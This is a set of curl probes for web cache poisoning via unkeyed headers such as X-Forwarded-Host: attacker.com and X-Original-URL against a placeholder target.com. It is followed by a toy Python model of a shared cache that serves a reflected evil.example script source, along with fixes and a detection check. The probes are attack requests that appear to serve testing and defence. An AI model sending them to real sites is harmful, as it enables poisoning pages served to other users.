# ─── Unkeyed Header Probes ───────────────────────────────────────────────
# These headers are commonly excluded from the cache key.
# If the backend reflects their value, the poisoned response may be cached.
# 1. X-Forwarded-Host (most common)
curl -s -o /dev/null -D - \
-H "X-Forwarded-Host: attacker.com" \
"https://target.com/page"
# 2. X-Original-URL
curl -s -o /dev/null -D - \
-H "X-Original-URL: /admin" \
"https://target.com/page"
# 3. X-Rewrite-URL
curl -s -o /dev/null -D - \
-H "X-Rewrite-URL: /admin" \
"https://target.com/page"
# 4. X-Forwarded-Scheme + X-Forwarded-Host (combined)
curl -s -o /dev/null -D - \
-H "X-Forwarded-Scheme: nothttps" \
-H "X-Forwarded-Host: attacker.com" \
"https://target.com/page"
# 5. X-Host header
curl -s -o /dev/null -D - \
-H "X-Host: attacker.com" \
"https://target.com/page"
# 6. X-Forwarded-Server
curl -s -o /dev/null -D - \
-H "X-Forwarded-Server: attacker.com" \
"https://target.com/page"
# 7. X-HTTP-Method-Override
curl -s -o /dev/null -D - \
-H "X-HTTP-Method-Override: GET" \
"https://target.com/page"
# 8. Fat GET (body in GET request)
curl -s -o /dev/null -D - \
-X GET -d "param=INJECTED_VALUE" \
"https://target.com/page"
# 9. X-Forwarded-Port
curl -s -o /dev/null -D - \
-H "X-Forwarded-Port: 443" \
"https://target.com/page"
# 10. True-Client-IP
curl -s -o /dev/null -D - \
-H "True-Client-IP: 127.0.0.1" \
"https://target.com/page"
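The comments at the top of the probe list state the mechanism in two lines: a shared cache keys responses on the URL alone, while the origin reflects one of these headers into the body, so whatever was sent on the first request is served to everyone who follows. The model below is an added example, not output of the generator above and not any vendor's cache code; the origin, cache, header set and request shapes are constructed for the demo. It shows the same path cached three ways: a naive key (the condition the probes look for), an edge that strips the unkeyed headers before they reach the origin, and a cache that folds the header values into its key.

```python
"""Toy shared cache in front of an origin that reflects X-Forwarded-Host.

Constructed for illustration: the origin, the cache and the request
objects are all hypothetical; nothing here talks to a network.
"""
from dataclasses import dataclass, field

# Headers commonly excluded from a cache key (the set probed above).
UNKEYED_HEADERS = {
    "x-forwarded-host", "x-original-url", "x-rewrite-url",
    "x-forwarded-scheme", "x-host", "x-forwarded-server",
    "x-forwarded-port", "true-client-ip", "x-http-method-override",
}

TRUSTED_HOST = "target.example"  # constructed canonical hostname


@dataclass
class Request:
    path: str
    headers: dict  # lower-cased header name -> value


def origin(req: Request) -> str:
    """Constructed origin: builds an absolute URL from the forwarded host.

    This reflection is what turns an unkeyed header into a poisoning
    primitive; a real origin would do it to build links or redirects.
    """
    host = req.headers.get("x-forwarded-host", TRUSTED_HOST)
    return f'<script src="https://{host}/static/app.js"></script>'


@dataclass
class Cache:
    # "naive": key on path only (vulnerable)
    # "strip": drop unkeyed headers at the edge before calling the origin
    # "key":   include unkeyed header values in the cache key
    mode: str = "naive"
    store: dict = field(default_factory=dict)

    def normalise(self, req: Request) -> Request:
        if self.mode == "strip":
            kept = {k: v for k, v in req.headers.items()
                    if k not in UNKEYED_HEADERS}
            return Request(req.path, kept)
        return req

    def key(self, req: Request) -> tuple:
        if self.mode == "key":
            extra = tuple(sorted((k, v) for k, v in req.headers.items()
                                 if k in UNKEYED_HEADERS))
            return (req.path, extra)
        return (req.path, ())

    def fetch(self, req: Request) -> tuple:
        """Return (body, 'HIT'|'MISS') the way a cache log would."""
        req = self.normalise(req)
        k = self.key(req)
        if k in self.store:
            return self.store[k], "HIT"
        body = origin(req)
        self.store[k] = body
        return body, "MISS"


def reflects_untrusted_host(body: str, trusted: str = TRUSTED_HOST) -> bool:
    """Defender-side check on a stored body: flag an absolute URL whose
    host is not the trusted one. Constructed, string-based check."""
    for part in body.split('"'):
        if part.startswith("https://"):
            host = part[len("https://"):].split("/", 1)[0]
            if host != trusted:
                return True
    return False


def victim_sees(mode: str) -> tuple:
    """Constructed scenario: a request carrying X-Forwarded-Host hits the
    cache first; an ordinary request for the same path follows. Return
    (body served to the second request, its cache status, flagged?)."""
    cache = Cache(mode)
    cache.fetch(Request("/page", {"x-forwarded-host": "evil.example"}))
    body, status = cache.fetch(Request("/page", {}))
    return body, status, reflects_untrusted_host(body)


if __name__ == "__main__":
    for mode in ("naive", "strip", "key"):
        body, status, flagged = victim_sees(mode)
        print(f"{mode:5s} {status:4s} flagged={flagged} {body}")
```

In "naive" mode the second, header-free request is a HIT that carries the first request's host, which is exactly what the `-D -` header dumps in the probes are meant to reveal (a HIT on a response whose body differs from a clean fetch). Stripping the headers at the edge is the cheapest fix when the origin has no legitimate use for them; keying on them is the right choice when it does, at the cost of a cache entry per distinct value. Running `reflects_untrusted_host` over stored bodies, or over a sample of HIT responses, gives a detection signal independent of which header was abused.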